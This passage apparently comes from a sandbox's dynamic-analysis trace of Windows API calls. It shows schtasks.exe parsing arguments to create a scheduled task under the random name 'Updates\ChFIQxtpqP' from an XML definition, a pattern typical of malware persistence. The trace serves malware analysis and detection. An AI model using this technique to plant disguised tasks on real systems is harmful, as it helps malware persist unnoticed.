0x1801b [0172.521] VerifyVersionInfoW (in: lpVersionInformation=0x25c958, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x25c958) returned 1 [0172.521] SetLastError (dwErrCode=0x0) [0172.521] lstrlenW (lpString="create") returned 6 [0172.521] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0172.521] SetLastError (dwErrCode=0x490) [0172.521] SetLastError (dwErrCode=0x0) [0172.521] lstrlenW (lpString="create") returned 6 [0172.522] GetProcessHeap () returned 0x600000 [0172.522] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6153b8 [0172.522] GetProcessHeap () returned 0x600000 [0172.522] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614bd8 [0172.522] _memicmp (_Buf1=0x614bd8, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.522] GetProcessHeap () returned 0x600000 [0172.522] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x16) returned 0x615398 [0172.522] SetLastError (dwErrCode=0x0) [0172.522] _memicmp (_Buf1=0x614c50, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.522] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x615a80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0172.522] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0172.522] GetProcessHeap () returned 0x600000 [0172.522] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x74e) returned 0x615c90 [0172.522] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x615c90 | out: lpData=0x615c90) returned 1 [0172.523] VerQueryValueW (in: pBlock=0x615c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25ca60, puLen=0x25ca64 | out: lplpBuffer=0x25ca60*=0x61602c, puLen=0x25ca64) returned 1 [0172.523] _memicmp (_Buf1=0x614c50, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.523] _vsnwprintf (in: _Buffer=0x615a80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x25ca48 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0172.523] VerQueryValueW (in: pBlock=0x615c90, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x25ca70, puLen=0x25ca6c | out: lplpBuffer=0x25ca70*=0x615e58, puLen=0x25ca6c) returned 1 [0172.523] lstrlenW (lpString="schtasks.exe") returned 12 [0172.523] lstrlenW (lpString="schtasks.exe") returned 12 [0172.523] lstrlenW (lpString=".EXE") returned 4 [0172.523] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0172.523] lstrlenW (lpString="schtasks.exe") returned 12 [0172.523] lstrlenW (lpString=".EXE") returned 4 [0172.523] lstrlenW (lpString="schtasks") returned 8 [0172.523] lstrlenW (lpString="/create") returned 7 [0172.523] _memicmp (_Buf1=0x614c50, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.523] _vsnwprintf (in: _Buffer=0x615a80, _BufferCount=0x19, _Format="%s %s", _ArgList=0x25ca48 | out: _Buffer="schtasks /create") returned 16 [0172.523] _memicmp (_Buf1=0x614cb0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.523] GetProcessHeap () returned 0x600000 [0172.523] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615378 [0172.523] _memicmp (_Buf1=0x614cc8, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.523] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x616718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0172.523] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0172.524] GetProcessHeap () returned 0x600000 [0172.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x30) returned 0x616958 [0172.524] _vsnwprintf (in: _Buffer=0x616670, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x25ca4c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0172.524] GetProcessHeap () returned 0x600000 [0172.524] GetProcessHeap () returned 0x600000 [0172.524] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615c90) returned 1 [0172.524] GetProcessHeap () returned 0x600000 [0172.524] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615c90) returned 0x74e [0172.524] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615c90 | out: hHeap=0x600000) returned 1 [0172.524] SetLastError (dwErrCode=0x0) [0172.524] GetThreadLocale () returned 0x409 [0172.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.524] lstrlenW (lpString="create") returned 6 [0172.524] GetThreadLocale () returned 0x409 [0172.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.524] lstrlenW (lpString="?") returned 1 [0172.524] GetThreadLocale () returned 0x409 [0172.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.524] lstrlenW (lpString="s") returned 1 [0172.524] GetThreadLocale () returned 0x409 [0172.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.524] lstrlenW (lpString="u") returned 1 [0172.524] GetThreadLocale () returned 0x409 [0172.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.524] lstrlenW (lpString="p") returned 1 [0172.524] GetThreadLocale () returned 0x409 [0172.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.524] lstrlenW (lpString="ru") returned 2 [0172.525] GetThreadLocale () returned 0x409 [0172.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.525] lstrlenW (lpString="rp") returned 2 [0172.525] GetThreadLocale () returned 0x409 [0172.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.525] lstrlenW (lpString="sc") returned 2 [0172.525] GetThreadLocale () returned 0x409 [0172.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.525] lstrlenW (lpString="mo") returned 2 [0172.525] GetThreadLocale () returned 0x409 [0172.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.525] lstrlenW (lpString="d") returned 1 [0172.525] GetThreadLocale () returned 0x409 [0172.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.525] lstrlenW (lpString="m") returned 1 [0172.525] GetThreadLocale () returned 0x409 [0172.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.525] lstrlenW (lpString="i") returned 1 [0172.525] GetThreadLocale () returned 0x409 [0172.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.525] lstrlenW (lpString="tn") returned 2 [0172.525] GetThreadLocale () returned 0x409 [0172.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.525] lstrlenW (lpString="tr") returned 2 [0172.525] GetThreadLocale () returned 0x409 [0172.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.526] lstrlenW (lpString="st") returned 2 [0172.526] GetThreadLocale () returned 0x409 [0172.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.526] lstrlenW (lpString="sd") returned 2 [0172.526] GetThreadLocale () returned 0x409 [0172.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.526] lstrlenW (lpString="ed") returned 2 [0172.526] GetThreadLocale () returned 0x409 [0172.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.526] lstrlenW (lpString="it") returned 2 [0172.526] GetThreadLocale () returned 0x409 [0172.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.526] lstrlenW (lpString="et") returned 2 [0172.526] GetThreadLocale () returned 0x409 [0172.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.526] lstrlenW (lpString="k") returned 1 [0172.526] GetThreadLocale () returned 0x409 [0172.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.526] lstrlenW (lpString="du") returned 2 [0172.526] GetThreadLocale () returned 0x409 [0172.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.526] lstrlenW (lpString="ri") returned 2 [0172.526] GetThreadLocale () returned 0x409 [0172.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.526] lstrlenW (lpString="z") returned 1 [0172.526] GetThreadLocale () returned 0x409 [0172.527] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.527] lstrlenW (lpString="f") returned 1 [0172.527] GetThreadLocale () returned 0x409 [0172.527] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.527] lstrlenW (lpString="v1") returned 2 [0172.527] GetThreadLocale () returned 0x409 [0172.527] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.527] lstrlenW (lpString="xml") returned 3 [0172.527] GetThreadLocale () returned 0x409 [0172.527] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.527] lstrlenW (lpString="ec") returned 2 [0172.527] GetThreadLocale () returned 0x409 [0172.527] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.527] lstrlenW (lpString="rl") returned 2 [0172.527] GetThreadLocale () returned 0x409 [0172.527] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.527] lstrlenW (lpString="delay") returned 5 [0172.527] GetThreadLocale () returned 0x409 [0172.527] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.527] lstrlenW (lpString="np") returned 2 [0172.527] SetLastError (dwErrCode=0x0) [0172.527] SetLastError (dwErrCode=0x0) [0172.527] lstrlenW (lpString="/Create") returned 7 [0172.527] lstrlenW (lpString="-/") returned 2 [0172.527] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.528] lstrlenW (lpString="create") returned 6 [0172.528] lstrlenW (lpString="create") returned 6 [0172.528] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.528] lstrlenW (lpString="Create") returned 6 [0172.528] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.528] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|create|") returned 8 [0172.528] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|Create|") returned 8 [0172.528] lstrlenW (lpString="|create|") returned 8 [0172.528] lstrlenW (lpString="|Create|") returned 8 [0172.528] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0172.528] SetLastError (dwErrCode=0x0) [0172.528] SetLastError (dwErrCode=0x0) [0172.528] SetLastError (dwErrCode=0x0) [0172.528] lstrlenW (lpString="/TN") returned 3 [0172.528] lstrlenW (lpString="-/") returned 2 [0172.528] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.528] lstrlenW (lpString="create") returned 6 [0172.528] lstrlenW (lpString="create") returned 6 [0172.528] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.528] lstrlenW (lpString="TN") returned 2 [0172.528] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.528] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|create|") returned 8 [0172.528] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.528] lstrlenW (lpString="|create|") returned 8 [0172.529] lstrlenW (lpString="|TN|") returned 4 [0172.529] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0172.529] SetLastError (dwErrCode=0x490) [0172.529] lstrlenW (lpString="?") returned 1 [0172.529] lstrlenW (lpString="?") returned 1 [0172.529] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.529] lstrlenW (lpString="TN") returned 2 [0172.529] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.529] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|?|") returned 3 [0172.529] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.529] lstrlenW (lpString="|?|") returned 3 [0172.529] lstrlenW (lpString="|TN|") returned 4 [0172.529] SetLastError (dwErrCode=0x490) [0172.529] lstrlenW (lpString="s") returned 1 [0172.529] lstrlenW (lpString="s") returned 1 [0172.529] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.529] lstrlenW (lpString="TN") returned 2 [0172.529] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.529] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|s|") returned 3 [0172.529] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.529] lstrlenW (lpString="|s|") returned 3 [0172.529] lstrlenW (lpString="|TN|") returned 4 [0172.529] SetLastError (dwErrCode=0x490) [0172.530] lstrlenW (lpString="u") returned 1 [0172.530] lstrlenW (lpString="u") returned 1 [0172.530] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.530] lstrlenW (lpString="TN") returned 2 [0172.530] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.530] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|u|") returned 3 [0172.530] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.530] lstrlenW (lpString="|u|") returned 3 [0172.530] lstrlenW (lpString="|TN|") returned 4 [0172.530] SetLastError (dwErrCode=0x490) [0172.530] lstrlenW (lpString="p") returned 1 [0172.530] lstrlenW (lpString="p") returned 1 [0172.530] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.530] lstrlenW (lpString="TN") returned 2 [0172.530] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.530] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|p|") returned 3 [0172.530] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.530] lstrlenW (lpString="|p|") returned 3 [0172.530] lstrlenW (lpString="|TN|") returned 4 [0172.530] SetLastError (dwErrCode=0x490) [0172.530] lstrlenW (lpString="ru") returned 2 [0172.530] lstrlenW (lpString="ru") returned 2 [0172.530] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.531] lstrlenW (lpString="TN") returned 2 [0172.531] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.531] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|ru|") returned 4 [0172.531] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.531] lstrlenW (lpString="|ru|") returned 4 [0172.531] lstrlenW (lpString="|TN|") returned 4 [0172.531] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0 [0172.531] SetLastError (dwErrCode=0x490) [0172.531] lstrlenW (lpString="rp") returned 2 [0172.531] lstrlenW (lpString="rp") returned 2 [0172.531] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.531] lstrlenW (lpString="TN") returned 2 [0172.531] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.531] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|rp|") returned 4 [0172.531] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.531] lstrlenW (lpString="|rp|") returned 4 [0172.531] lstrlenW (lpString="|TN|") returned 4 [0172.531] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0 [0172.531] SetLastError (dwErrCode=0x490) [0172.531] lstrlenW (lpString="sc") returned 2 [0172.531] lstrlenW (lpString="sc") returned 2 [0172.531] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.531] lstrlenW (lpString="TN") returned 2 [0172.532] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.532] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|sc|") returned 4 [0172.532] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.532] lstrlenW (lpString="|sc|") returned 4 [0172.532] lstrlenW (lpString="|TN|") returned 4 [0172.532] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0 [0172.532] SetLastError (dwErrCode=0x490) [0172.532] lstrlenW (lpString="mo") returned 2 [0172.532] lstrlenW (lpString="mo") returned 2 [0172.532] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.532] lstrlenW (lpString="TN") returned 2 [0172.532] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.532] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|mo|") returned 4 [0172.532] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.532] lstrlenW (lpString="|mo|") returned 4 [0172.532] lstrlenW (lpString="|TN|") returned 4 [0172.532] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0 [0172.532] SetLastError (dwErrCode=0x490) [0172.533] lstrlenW (lpString="d") returned 1 [0172.533] lstrlenW (lpString="d") returned 1 [0172.533] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.533] lstrlenW (lpString="TN") returned 2 [0172.533] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.533] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|d|") returned 3 [0172.533] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.533] lstrlenW (lpString="|d|") returned 3 [0172.533] lstrlenW (lpString="|TN|") returned 4 [0172.533] SetLastError (dwErrCode=0x490) [0172.533] lstrlenW (lpString="m") returned 1 [0172.533] lstrlenW (lpString="m") returned 1 [0172.533] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.533] lstrlenW (lpString="TN") returned 2 [0172.533] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.533] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|m|") returned 3 [0172.533] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.533] lstrlenW (lpString="|m|") returned 3 [0172.533] lstrlenW (lpString="|TN|") returned 4 [0172.533] SetLastError (dwErrCode=0x490) [0172.533] lstrlenW (lpString="i") returned 1 [0172.533] lstrlenW (lpString="i") returned 1 [0172.533] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.533] lstrlenW (lpString="TN") returned 2 [0172.534] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.534] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|i|") returned 3 [0172.534] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.534] lstrlenW (lpString="|i|") returned 3 [0172.534] lstrlenW (lpString="|TN|") returned 4 [0172.534] SetLastError (dwErrCode=0x490) [0172.534] lstrlenW (lpString="tn") returned 2 [0172.534] lstrlenW (lpString="tn") returned 2 [0172.534] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.534] lstrlenW (lpString="TN") returned 2 [0172.534] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.534] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|tn|") returned 4 [0172.534] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|TN|") returned 4 [0172.534] lstrlenW (lpString="|tn|") returned 4 [0172.534] lstrlenW (lpString="|TN|") returned 4 [0172.534] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|" [0172.534] SetLastError (dwErrCode=0x0) [0172.534] SetLastError (dwErrCode=0x0) [0172.534] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0172.534] lstrlenW (lpString="-/") returned 2 [0172.534] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0 [0172.534] SetLastError (dwErrCode=0x490) [0172.534] SetLastError (dwErrCode=0x490) [0172.534] SetLastError (dwErrCode=0x0) [0172.534] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0172.534] StrChrIW (lpStart="Updates\\ChFIQxtpqP", wMatch=0x3a) returned 0x0 [0172.535] SetLastError (dwErrCode=0x490) [0172.535] SetLastError (dwErrCode=0x0) [0172.535] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0172.535] SetLastError (dwErrCode=0x0) [0172.535] SetLastError (dwErrCode=0x0) [0172.535] lstrlenW (lpString="/XML") returned 4 [0172.535] lstrlenW (lpString="-/") returned 2 [0172.535] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.535] lstrlenW (lpString="create") returned 6 [0172.535] lstrlenW (lpString="create") returned 6 [0172.535] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.535] lstrlenW (lpString="XML") returned 3 [0172.535] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.535] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|create|") returned 8 [0172.535] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.535] lstrlenW (lpString="|create|") returned 8 [0172.535] lstrlenW (lpString="|XML|") returned 5 [0172.535] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0 [0172.535] SetLastError (dwErrCode=0x490) [0172.535] lstrlenW (lpString="?") returned 1 [0172.535] lstrlenW (lpString="?") returned 1 [0172.535] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.535] lstrlenW (lpString="XML") returned 3 [0172.535] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.535] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|?|") returned 3 [0172.536] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.536] lstrlenW (lpString="|?|") returned 3 [0172.536] lstrlenW (lpString="|XML|") returned 5 [0172.536] SetLastError (dwErrCode=0x490) [0172.536] lstrlenW (lpString="s") returned 1 [0172.536] lstrlenW (lpString="s") returned 1 [0172.536] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.536] lstrlenW (lpString="XML") returned 3 [0172.536] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.536] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|s|") returned 3 [0172.536] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.536] lstrlenW (lpString="|s|") returned 3 [0172.536] lstrlenW (lpString="|XML|") returned 5 [0172.536] SetLastError (dwErrCode=0x490) [0172.536] lstrlenW (lpString="u") returned 1 [0172.536] lstrlenW (lpString="u") returned 1 [0172.536] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.536] lstrlenW (lpString="XML") returned 3 [0172.536] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.536] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|u|") returned 3 [0172.536] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25ca34 | out: _Buffer="|XML|") returned 5 [0172.541] lstrlenW (lpString="|u|") returned 3 [0172.542] lstrlenW (lpString="|XML|") returned 5 [0172.542] SetLastError (dwErrCode=0x490) [0172.542] lstrlenW (lpString="p") returned 1 [0172.542] lstrlenW (lpString="p") returned 1 [0172.542] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.542] lstrlenW (lpString="XML") returned 3 [0172.542] _memicmp (_Buf1=0x614d10, 